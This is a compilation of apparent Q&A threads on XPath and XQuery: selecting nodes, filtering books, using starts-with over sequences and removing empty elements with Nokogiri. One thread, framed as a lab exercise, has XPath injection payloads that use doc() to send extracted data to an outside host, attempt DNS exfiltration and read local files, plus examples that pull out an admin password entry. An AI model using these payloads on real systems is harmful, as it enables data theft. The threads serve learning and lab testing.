The XPath (bookstore/book/title|bookstore/book/author) selects both the title and the author when both exist.
How can I select just the first match of these two rather than both, and get that value for every 'book' node in the document?
(bookstore/book/title|bookstore/book/author)[1] limits the result to just the first 'title' in the first book. But I need to get results from the other book nodes in the document as well.
I'm assuming that by 'first' you mean 'first in document order', not 'first referenced in my XPath expression.'
In XPath 2.0, you can say
bookstore/book/((title|author)[1])
If you only have XPath 1.0, let us know and we can proceed from there. Also tell us something about the broader environment (XSLT? XQuery? JavaScript?), because some of this may have to be done outside of XPath.
Update: I just tested this, using Simple Online XPath Tester with XPath 2.0. Given the following XML input:
<?xml version="1.0" encoding="UTF-8"?>
<bookstore>
<book category="COOKING">
<title lang="en">Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.00</price>
</book>
<book category="CHILDREN">
<author>J K. Rowling</author>
<year>2005</year>
<price>29.99</price>
</book>
<book category="WEB">
<title lang="en">XQuery Kick Start</title>
<author>James McGovern</author>
<author>Per Bothner</author>
<author>Kurt Cagle</author>
<author>James Linn</author>
<author>Vaidyanathan Nagarajan</author>
<year>2003</year>
<price>49.99</price>
</book>
<book category="WEB">
<title lang="en">Learning XML</title>
<author>Erik T. Ray</author>
<year>2003</year>
<price>39.95</price>
</book>
</bookstore>
and the XPath expression
/bookstore/book/((title|author)[1])
I get the following output, which appears to be what you asked for:
<title lang="en">Everyday Italian</title>
<author>J K. Rowling</author>
<title lang="en">XQuery Kick Start</title>
<title lang="en">Learning XML</title>
For XPath 1.0
If you don't have XPath 2.0, as I suspect you don't, and you still want to do it all in XPath, here's what I would do:
/bookstore/book/title[1] | /bookstore/book[not(title)]/author[1]
What does this do? It gives the (first) title of each book that has a title, as well as the (first) author of each book that doesn't have a title.
This expression is not quite as general as what you asked for: it assumes that <title> comes before <author> when it exists, as it does in your sample data. If your data has author before title, then the above expression will still prefer title despite the order.
If you really need the first of the two regardless of whether it's author or title, try
/bookstore/book/title[1][not(preceding-sibling::author)] |
/bookstore/book/author[1][not(preceding-sibling::title)]
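To check both XPath 1.0 expressions without an XPath 2.0 processor, here is a minimal Java sketch using the JDK's built-in javax.xml.xpath API, which implements XPath 1.0. The input is a trimmed, hypothetical variant of the sample in which the third book lists its author before its title, so the two expressions give different answers. The class and method names are illustrative only.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

class FirstOfTitleOrAuthor {
    // Hypothetical trimmed sample: the third book puts <author> before <title>.
    static final String XML =
        "<bookstore>"
        + "<book><title>Everyday Italian</title><author>Giada De Laurentiis</author></book>"
        + "<book><author>J K. Rowling</author></book>"
        + "<book><author>Erik T. Ray</author><title>Learning XML</title></book>"
        + "</bookstore>";

    // Parses the XML, evaluates an XPath 1.0 expression and returns
    // the text content of each selected node in result order.
    static List<String> select(String xml, String expr) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
        NodeList nodes = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate(expr, doc, XPathConstants.NODESET);
        List<String> values = new ArrayList<>();
        for (int i = 0; i < nodes.getLength(); i++) {
            values.add(nodes.item(i).getTextContent());
        }
        return values;
    }

    public static void main(String[] args) throws Exception {
        // Prefers <title> whenever a book has one.
        System.out.println(select(XML,
                "/bookstore/book/title[1] | /bookstore/book[not(title)]/author[1]"));
        // Takes whichever of <title>/<author> comes first in each book.
        System.out.println(select(XML,
                "/bookstore/book/title[1][not(preceding-sibling::author)]"
                + " | /bookstore/book/author[1][not(preceding-sibling::title)]"));
    }
}
```

For the third book, the first expression returns "Learning XML" because it always prefers title, while the second returns "Erik T. Ray" because that author comes first in document order.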
I'm trying to understand how to use XPath's doc() function in several ways to carry out XPath injections.
Lab's query:
String xquery = "/root/books/book[contains(title/text(), '" + query + "')]";
I can use both XPath 2.0 and 3.0.
I'm able to extract data and export it through HTTP, for example:
test') and doc((concat('http://IP/data/?d=',(encode-for-uri((normalize-space((/*[1]/*[2]/*[2]/@*[2]))))))))/data=220248 and string('1'='1
But I'm not able to:
Extract data and export it through DNS requests:
test') and doc((concat(name((/*[2])) , 'domain.com'))) and string('1'='1 -> it doesn't give any error, but nothing happens.
Read a local XML file (the file's permissions are fine):
test') and doc('file:///home/lubuntu/test.xml')/text() and string('1'='1 -> it says file not found, even though the file is clearly there.
What is wrong in my payloads?
Updates:
xpath processor: net.sf.saxon
os: Linux lubuntu 4.18.0-17-generic #18~18.04.1-Ubuntu
JAVA_HOME=/usr/local/openjdk-11
JAVA_VERSION=11.0.9.1
LANG=C.UTF-8
About the file reading: problem solved. The lab was running inside a Docker container.
About the data exfiltration via DNS requests: I still can't figure out why nothing happens. I also tried a basic injection like doc((concat('ABCTEST', '.domain.com' ))) and string('1'='1 but still nothing happens.
It is difficult to understand what exactly you are trying to achieve.
Here is a simple example of XPath injection in XSLT/XPath 3.0, based on the fact that:
contains($anyString, '') eq true()
XML document:
<x>
<root>
<books>
<book>
<title>Book1</title>
</book>
<book>
<title>Book2</title>
</book>
<book>
<title>Book3</title>
</book>
</books>
</root>
</x>
XSLT stylesheet:
<xsl:stylesheet version="3.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output omit-xml-declaration="yes" indent="yes"/>
<xsl:template match="/">
<xsl:variable name="query">'</xsl:variable>
<xsl:variable name="vXpath1">/x/root/books/book[contains(title/text(), '</xsl:variable>
<xsl:variable name="vXpath2" select="$vXpath1 || $query || ')]'"/>
<xsl:evaluate xpath="$vXpath2" context-item="/" />
</xsl:template>
</xsl:stylesheet>
and finally, the result of applying the transformation to the XML document:
<book>
<title>Book1</title>
</book>
<book>
<title>Book2</title>
</book>
<book>
<title>Book3</title>
</book>
Explanation:
We were able to get all <book> elements in the document, not just the one whose <title> contains a particular string (the password).
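The same idea can be reproduced against the lab's own Java query pattern with the JDK's XPath 1.0 engine. A minimal sketch, assuming a trimmed copy of the sample without the <x> wrapper. Because the lab's query appends ')] (quote included) after the user input, a lone apostrophe would leave an unbalanced quote, so the hypothetical payload ') and ('1'='1 is used instead; it still relies on contains(..., '') being true.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

class XPathInjectionDemo {
    // Trimmed copy of the sample document, without the <x> wrapper.
    static final String XML =
        "<root><books>"
        + "<book><title>Book1</title></book>"
        + "<book><title>Book2</title></book>"
        + "<book><title>Book3</title></book>"
        + "</books></root>";

    // UNSAFE on purpose: user input is pasted into the expression,
    // the same way the lab's query string is built.
    static String buildQuery(String query) {
        return "/root/books/book[contains(title/text(), '" + query + "')]";
    }

    // Runs the concatenated query and returns the titles of the matched books.
    static List<String> matchedTitles(String query) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                .parse(new InputSource(new StringReader(XML)));
        NodeList books = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate(buildQuery(query), doc, XPathConstants.NODESET);
        List<String> titles = new ArrayList<>();
        for (int i = 0; i < books.getLength(); i++) {
            titles.add(books.item(i).getTextContent());
        }
        return titles;
    }

    public static void main(String[] args) throws Exception {
        // Intended use: a plain search term matches one book.
        System.out.println(matchedTitles("Book2"));
        // Hypothetical payload: the expression becomes
        // contains(title/text(), '') and ('1'='1'), which is true for every book.
        System.out.println(matchedTitles("') and ('1'='1"));
    }
}
```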
Update
Here is another example:
We have a slightly different XML document:
<x>
<root>
<books>
<book name="regular">
<title>Book1 with password: regular</title>
</book>
<book name="admin">
<title>Admin with password: SuperSecret</title>
</book>
<book name="maintainer">
<title>Book3 with password: maintainer</title>
</book>
</books>
</root>
</x>
And the transformation now is (only $query is changed):
<xsl:stylesheet version="3.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output omit-xml-declaration="yes" indent="yes"/>
<xsl:template match="/">
<xsl:variable name="query">') and @name eq "admin" and true(</xsl:variable>
<xsl:variable name="vXpath1">/x/root/books/book[contains(title/text(), '</xsl:variable>
<xsl:variable name="vXpath2" select="$vXpath1 || $query || ')]'"/>
<xsl:evaluate xpath="$vXpath2" context-item="/" />
</xsl:template>
</xsl:stylesheet>
Now the result is that we get exactly the <book> element with the desired name "admin":
<book name="admin">
<title>Admin with password: SuperSecret</title>
</book>
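Against the lab's Java-style query, the equivalent XPath 1.0 payload has to reopen a string literal for the trailing quote, and use = instead of eq. A minimal sketch, assuming a trimmed copy of the document above without the <x> wrapper; the payload ') and @name='admin' and ('1'='1 is a hypothetical adaptation of the one in the stylesheet.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

class AdminInjectionDemo {
    // Trimmed copy of the second sample document, without the <x> wrapper.
    static final String XML =
        "<root><books>"
        + "<book name=\"regular\"><title>Book1 with password: regular</title></book>"
        + "<book name=\"admin\"><title>Admin with password: SuperSecret</title></book>"
        + "<book name=\"maintainer\"><title>Book3 with password: maintainer</title></book>"
        + "</books></root>";

    // UNSAFE on purpose: same string concatenation as the lab's query.
    static String buildQuery(String query) {
        return "/root/books/book[contains(title/text(), '" + query + "')]";
    }

    // Returns the name attribute of every book the concatenated query selects.
    static List<String> matchedNames(String query) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                .parse(new InputSource(new StringReader(XML)));
        NodeList books = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate(buildQuery(query), doc, XPathConstants.NODESET);
        List<String> names = new ArrayList<>();
        for (int i = 0; i < books.getLength(); i++) {
            names.add(((Element) books.item(i)).getAttribute("name"));
        }
        return names;
    }

    public static void main(String[] args) throws Exception {
        // The expression becomes:
        // contains(title/text(), '') and @name='admin' and ('1'='1')
        System.out.println(matchedNames("') and @name='admin' and ('1'='1"));
    }
}
```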
<CATALOG>
<BOOK>
<TITLE>Hadoop Defnitive Guide</TITLE>
<AUTHOR>Tom White</AUTHOR>
<COUNTRY>US</COUNTRY>
<COMPANY>CLOUDERA</COMPANY>
<PRICE>24.90</PRICE>
<YEAR>2012</YEAR>
</BOOK>
</CATALOG>
This is the XML I am using.
I want to extract only the TITLE and COMPANY elements. Is there any way to extract them using a regex or XPath?
First thing you need to do is format your XML like so:
<CATALOG>
<BOOK>
<TITLE>Hadoop Defnitive Guide</TITLE>
<AUTHOR>Tom White</AUTHOR>
<COUNTRY>US</COUNTRY>
<COMPANY>CLOUDERA</COMPANY>
<PRICE>24.90</PRICE>
<YEAR>2012</YEAR>
</BOOK>
</CATALOG>
Then you can extract those elements like so:
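/CATALOG/BOOK/*[self::TITLE or self::COMPANY]
Note that XPath name tests are case-sensitive, so they must match the uppercase element names in your XML exactly.
You can find more about axes here: http://www.w3schools.com/xsl/xpath_axes.asp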
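A quick way to see the effect of case in the self:: name tests is to run the uppercase and lowercase versions side by side. This is a minimal Java sketch using the JDK's XPath 1.0 engine on the catalog from the question; the class and method names are illustrative.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

class SelectTitleAndCompany {
    // The catalog from the question, on one line.
    static final String XML =
        "<CATALOG><BOOK>"
        + "<TITLE>Hadoop Defnitive Guide</TITLE><AUTHOR>Tom White</AUTHOR>"
        + "<COUNTRY>US</COUNTRY><COMPANY>CLOUDERA</COMPANY>"
        + "<PRICE>24.90</PRICE><YEAR>2012</YEAR>"
        + "</BOOK></CATALOG>";

    // Returns "NAME=value" for each element the expression selects.
    static List<String> select(String expr) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                .parse(new InputSource(new StringReader(XML)));
        NodeList nodes = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate(expr, doc, XPathConstants.NODESET);
        List<String> out = new ArrayList<>();
        for (int i = 0; i < nodes.getLength(); i++) {
            Node n = nodes.item(i);
            out.add(n.getNodeName() + "=" + n.getTextContent());
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Matches, because the names are written in the same case as the XML.
        System.out.println(select("/CATALOG/BOOK/*[self::TITLE or self::COMPANY]"));
        // Selects nothing: 'title' and 'TITLE' are different names.
        System.out.println(select("/CATALOG/BOOK/*[self::title or self::company]"));
    }
}
```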
I have this XML file, and I need to get the name and author(s) of each book where the name of at least one author starts with "E".
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library SYSTEM "knihy.dtd">
<library>
<book isbn="0470114878">
<author hlavni="hlavni">David Hunter</author>
<author>Jeff Rafter</author>
<author>Joe Fawcett</author>
<author>Eric van der Vlist</author>
<author>Danny Ayers</author>
<name>Beginning XML</name>
<publisher>Wrox</publisher>
</book>
<book isbn="0596004206">
<author>Erik Ray</author>
<name>Learning XML</name>
<publisher>O'Reilly</publisher>
</book>
<book isbn="0764547593">
<author>Kay Ethier</author>
<author>Alan Houser</author>
<name>XML Weekend Crash Course</name>
<year>2001</year>
</book>
<book isbn="1590596765">
<author>Sas Jacobs</author>
<name>Beginning XML with DOM and Ajax</name>
<publisher>Apress</publisher>
<year>2006</year>
</book>
</library>
I tried this approach
for $book in /library/book[starts-with(author, "E")]
return $book
but it throws an XPathException in invokeTransform: A sequence of more than one item is not allowed as the first argument of starts-with() ("David Hunter", "Jeff Rafter", ...). So how can I check this sequence?
As the error message suggests, use starts-with() in a predicate on the individual author elements, instead of passing all the author child elements to starts-with() at once:
for $book in /library/book[author[starts-with(., "E")]]
return $book
The above returns all books where the name of at least one author starts with "E".
Output:
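For comparison, an XPath 1.0 engine such as the JDK's does not raise this error at all: in XPath 1.0, starts-with() converts a node-set argument to the string value of its first node, so the original predicate silently tests only the first author of each book. A minimal Java sketch, assuming a trimmed copy of the library document with the DOCTYPE line removed so the parser does not try to load knihy.dtd:

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

class BooksWithAuthorStartingWithE {
    // Trimmed library document (no DOCTYPE, no publisher/year elements).
    static final String XML =
        "<library>"
        + "<book isbn=\"0470114878\"><author>David Hunter</author><author>Jeff Rafter</author>"
        + "<author>Joe Fawcett</author><author>Eric van der Vlist</author>"
        + "<author>Danny Ayers</author><name>Beginning XML</name></book>"
        + "<book isbn=\"0596004206\"><author>Erik Ray</author><name>Learning XML</name></book>"
        + "<book isbn=\"0764547593\"><author>Kay Ethier</author><author>Alan Houser</author>"
        + "<name>XML Weekend Crash Course</name></book>"
        + "<book isbn=\"1590596765\"><author>Sas Jacobs</author>"
        + "<name>Beginning XML with DOM and Ajax</name></book>"
        + "</library>";

    // Returns the text of every node the XPath 1.0 expression selects.
    static List<String> select(String expr) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                .parse(new InputSource(new StringReader(XML)));
        NodeList nodes = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate(expr, doc, XPathConstants.NODESET);
        List<String> out = new ArrayList<>();
        for (int i = 0; i < nodes.getLength(); i++) {
            out.add(nodes.item(i).getTextContent());
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Tests every author: finds "Eric van der Vlist" and "Erik Ray".
        System.out.println(select("/library/book[author[starts-with(., 'E')]]/name"));
        // Tests only the FIRST author of each book, so "Beginning XML" is missed.
        System.out.println(select("/library/book[starts-with(author, 'E')]/name"));
    }
}
```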
<book isbn="0470114878">
<author hlavni="hlavni">David Hunter</author>
<author>Jeff Rafter</author>
<author>Joe Fawcett</author>
<author>Eric van der Vlist</author>
<author>Danny Ayers</author>
<name>Beginning XML</name>
<publisher>Wrox</publisher>
</book>
<book isbn="0596004206">
<author>Erik Ray</author>
<name>Learning XML</name>
<publisher>O'Reilly</publisher>
</book>
I'm new to XPath. I'm trying to use the XML task in SSIS to load some values, using Microsoft's sample XML inventory below.
How can I load the first-name value from bookstore/book where style is 'novel' and award = 'Pulitzer'?
//book[@style='novel' and ./author/award/text()='Pulitzer'] is what I'm trying. It returns the whole book element. What should I change to get just the first-name value?
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="myfile.xsl" ?>
<bookstore specialty="novel">
<book style="autobiography">
<author>
<first-name>Joe</first-name>
<last-name>Bob</last-name>
<award>Trenton Literary Review Honorable Mention</award>
</author>
<price>12</price>
</book>
<book style="textbook">
<author>
<first-name>Mary</first-name>
<last-name>Bob</last-name>
<publication>Selected Short Stories of
<first-name>Mary</first-name>
<last-name>Bob</last-name>
</publication>
</author>
<editor>
<first-name>Britney</first-name>
<last-name>Bob</last-name>
</editor>
<price>55</price>
</book>
<magazine style="glossy" frequency="monthly">
<price>2.50</price>
<subscription price="24" per="year"/>
</magazine>
<book style="novel" id="myfave">
<author>
<first-name>Toni</first-name>
<last-name>Bob</last-name>
<degree from="Trenton U">B.A.</degree>
<degree from="Harvard">Ph.D.</degree>
<award>Pulitzer</award>
<publication>Still in Trenton</publication>
<publication>Trenton Forever</publication>
</author>
<price intl="Canada" exchange="0.7">6.50</price>
<excerpt>
<p>It was a dark and stormy night.</p>
<p>But then all nights in Trenton seem dark and
stormy to someone who has gone through what
<emph>I</emph> have.</p>
<definition-list>
<term>Trenton</term>
<definition>misery</definition>
</definition-list>
</excerpt>
</book>
<my:book xmlns:my="uri:mynamespace" style="leather" price="29.50">
<my:title>Who's Who in Trenton</my:title>
<my:author>Robert Bob</my:author>
</my:book>
</bookstore>
I found an answer:
//book[@style='novel' and ./author/award/text()='Pulitzer']//first-name
Use:
/*/book[@style='novel']/author[award = 'Pulitzer']/first-name
This selects every first-name element whose parent author has an award child with the string value 'Pulitzer', where that author's parent is a book whose style attribute is "novel", and that book's parent is the top element of the XML document.
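Both the answer's expression and the question's corrected one can be checked with the JDK's XPath 1.0 engine. A minimal Java sketch, assuming a trimmed version of the inventory sample in which the novel's <award> contains "Pulitzer", as the question's filter implies; names are illustrative.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

class PulitzerFirstName {
    // Trimmed inventory: one non-matching book and the Pulitzer-winning novel.
    static final String XML =
        "<bookstore specialty=\"novel\">"
        + "<book style=\"autobiography\"><author><first-name>Joe</first-name>"
        + "<last-name>Bob</last-name>"
        + "<award>Trenton Literary Review Honorable Mention</award></author>"
        + "<price>12</price></book>"
        + "<book style=\"novel\" id=\"myfave\"><author><first-name>Toni</first-name>"
        + "<last-name>Bob</last-name><award>Pulitzer</award></author>"
        + "<price>6.50</price></book>"
        + "</bookstore>";

    // Returns the text of every node the XPath 1.0 expression selects.
    static List<String> select(String expr) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                .parse(new InputSource(new StringReader(XML)));
        NodeList nodes = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate(expr, doc, XPathConstants.NODESET);
        List<String> out = new ArrayList<>();
        for (int i = 0; i < nodes.getLength(); i++) {
            out.add(nodes.item(i).getTextContent());
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // The answer's path: filter on the author, then step to first-name.
        System.out.println(select("/*/book[@style='novel']/author[award = 'Pulitzer']/first-name"));
        // The question's filter with //first-name appended.
        System.out.println(select("//book[@style='novel' and ./author/award/text()='Pulitzer']//first-name"));
    }
}
```

The answer's form is the more precise of the two: //first-name would also pick up first-name elements nested deeper inside the book (for example inside a publication element), while /author/.../first-name only takes the author's own child.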
A similar question in the same context: how can I do the reverse? Suppose I want to find the id of all books whose price is greater than 20. I know I'm being a nudge, but I really want to clear up my understanding.
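Here is the XPath you need; it selects each book whose price is greater than 20:
//book/price[text() > 20]/..
To get the id attribute of those books rather than the book elements themselves, use //book[price > 20]/@id (books without an id attribute contribute nothing).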
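The parent-step form and a predicate on book select the same elements. A minimal Java sketch with the JDK's XPath 1.0 engine, assuming a trimmed copy of the inventory containing only its three plain book elements (prices 12, 55 and 6.50). In that sample only the textbook costs more than 20, and it has no id attribute, so the /@id query comes back empty.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

class BooksOverTwenty {
    // Trimmed inventory: the three <book> elements with their prices.
    static final String XML =
        "<bookstore>"
        + "<book style=\"autobiography\"><price>12</price></book>"
        + "<book style=\"textbook\"><price>55</price></book>"
        + "<book style=\"novel\" id=\"myfave\"><price>6.50</price></book>"
        + "</bookstore>";

    // Returns the text (or attribute value) of every node selected.
    static List<String> select(String expr) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                .parse(new InputSource(new StringReader(XML)));
        NodeList nodes = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate(expr, doc, XPathConstants.NODESET);
        List<String> out = new ArrayList<>();
        for (int i = 0; i < nodes.getLength(); i++) {
            out.add(nodes.item(i).getTextContent());
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Step down to price, filter, then back up to the book with "..".
        System.out.println(select("//book/price[text() > 20]/../@style"));
        // Same books, filtered directly with a predicate on book.
        System.out.println(select("//book[price > 20]/@style"));
        // Only books that actually carry an id attribute contribute here.
        System.out.println(select("//book[price > 20]/@id"));
    }
}
```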
I have the XML below, where a few child elements have empty text.
doc = <<'XML'
<Book>
<BookId>BK45647</BookId>
<BookName>The Client by John Grisham</BookName>
<BookAuthenticationCode></BookAuthenticationCode>
<BookCategory>Suspense</BookCategory>
<BookSequence></BookSequence>
<BookPublisherInfo>
<PublisherId>PBBK12345</PublisherId>
<PublisherName>Mc.GrawHill</PublisherName>
<PublisherIndex></PublisherIndex>
<PublisherCategoryQuota></PublisherCategoryQuota>
</BookPublisherInfo>
<BookPurchaselist>
<Customer>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<MiddleName></MiddleName>
<NickName></NickName>
</Customer>
<Customer>
<FirstName>Winston</FirstName>
<LastName>Churchill</LastName>
<MiddleName></MiddleName>
<NickName></NickName>
</Customer>
</BookPurchaselist>
</Book>
XML
I tried the code below, but it doesn't work properly.
cust = doc.at_xpath("//Customer")
cust.each do |cust_obj|
if cust_obj.has_text? == false
cust_obj.delete
end
end
It doesn't work properly and produces the output below:
<Book>
<BookId>BK45647</BookId>
<BookName>The Client by John Grisham</BookName>
<BookAuthenticationCode></BookAuthenticationCode>
<BookCategory>Suspense</BookCategory>
<BookSequence></BookSequence>
<BookPublisherInfo>
<PublisherId>PBBK12345</PublisherId>
<PublisherName>Mc.GrawHill</PublisherName>
<PublisherIndex></PublisherIndex>
<PublisherCategoryQuota></PublisherCategoryQuota>
</BookPublisherInfo>
<BookPurchaselist>
<Customer>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<MiddleName></MiddleName>
</Customer>
<Customer>
<FirstName>Winston</FirstName>
<LastName>Churchill</LastName>
<NickName></NickName>
</Customer>
</BookPurchaselist>
</Book>
Some of the elements with empty text are deleted and others remain. How can I recursively delete the elements at a specific XPath that have empty data, and rewrite the XML?
I'm stuck here and need suggestions.
doc.xpath('//Customer/child::*[not(text())]').each do |node|
node.remove
end
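Use not(node()) instead of not(text()) if you only want to delete elements that have no child nodes at all; not(text()) also matches elements that contain child elements but no text.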
EDIT: Full working example (using the same code as above)
require 'nokogiri'
xml = <<-XML
<Book>
<BookId>BK45647</BookId>
<BookName>The Client by John Grisham</BookName>
<BookAuthenticationCode></BookAuthenticationCode>
<BookCategory>Suspense</BookCategory>
<BookSequence></BookSequence>
<BookPublisherInfo>
<PublisherId>PBBK12345</PublisherId>
<PublisherName>Mc.GrawHill</PublisherName>
<PublisherIndex></PublisherIndex>
<PublisherCategoryQuota></PublisherCategoryQuota>
</BookPublisherInfo>
<BookPurchaselist>
<Customer>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<MiddleName></MiddleName>
</Customer>
<Customer>
<FirstName>Winston</FirstName>
<LastName>Churchill</LastName>
<NickName></NickName>
</Customer>
</BookPurchaselist>
</Book>
XML
doc = Nokogiri.parse(xml)
doc.xpath('//Customer/child::*[not(text())]').each do |node|
node.remove
end
puts doc.to_s
The output of this program is:
<?xml version="1.0"?>
<Book>
<BookId>BK45647</BookId>
<BookName>The Client by John Grisham</BookName>
<BookAuthenticationCode/>
<BookCategory>Suspense</BookCategory>
<BookSequence/>
<BookPublisherInfo>
<PublisherId>PBBK12345</PublisherId>
<PublisherName>Mc.GrawHill</PublisherName>
<PublisherIndex/>
<PublisherCategoryQuota/>
</BookPublisherInfo>
<BookPurchaselist>
<Customer>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
</Customer>
<Customer>
<FirstName>Winston</FirstName>
<LastName>Churchill</LastName>
</Customer>
</BookPurchaselist>
</Book>
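The same select-then-remove approach also works outside Nokogiri. A minimal Java sketch using the JDK's DOM and XPath 1.0 APIs, assuming a trimmed copy of the question's XML (only the purchase list). The matches are copied into a plain list before anything is detached, so removing nodes cannot disturb the result set being iterated; the class and method names are illustrative.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.stream.StreamResult;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

class RemoveEmptyCustomerFields {
    // Trimmed copy of the question's purchase list.
    static final String XML =
        "<Book><BookPurchaselist>"
        + "<Customer><FirstName>John</FirstName><LastName>Smith</LastName>"
        + "<MiddleName></MiddleName><NickName></NickName></Customer>"
        + "<Customer><FirstName>Winston</FirstName><LastName>Churchill</LastName>"
        + "<MiddleName></MiddleName><NickName></NickName></Customer>"
        + "</BookPurchaselist></Book>";

    // Counts the nodes an XPath 1.0 expression selects in the given document.
    static int count(Document doc, String expr) throws Exception {
        return ((NodeList) XPathFactory.newInstance().newXPath()
                .evaluate(expr, doc, XPathConstants.NODESET)).getLength();
    }

    // Removes every child of a Customer that has no child nodes at all.
    static Document removeEmpty(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
        NodeList hits = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate("//Customer/*[not(node())]", doc, XPathConstants.NODESET);
        // Copy first, then detach.
        List<Node> toRemove = new ArrayList<>();
        for (int i = 0; i < hits.getLength(); i++) {
            toRemove.add(hits.item(i));
        }
        for (Node n : toRemove) {
            n.getParentNode().removeChild(n);
        }
        return doc;
    }

    public static void main(String[] args) throws Exception {
        Document doc = removeEmpty(XML);
        // Serialize the cleaned document to stdout.
        TransformerFactory.newInstance().newTransformer()
                .transform(new DOMSource(doc), new StreamResult(System.out));
        System.out.println();
    }
}
```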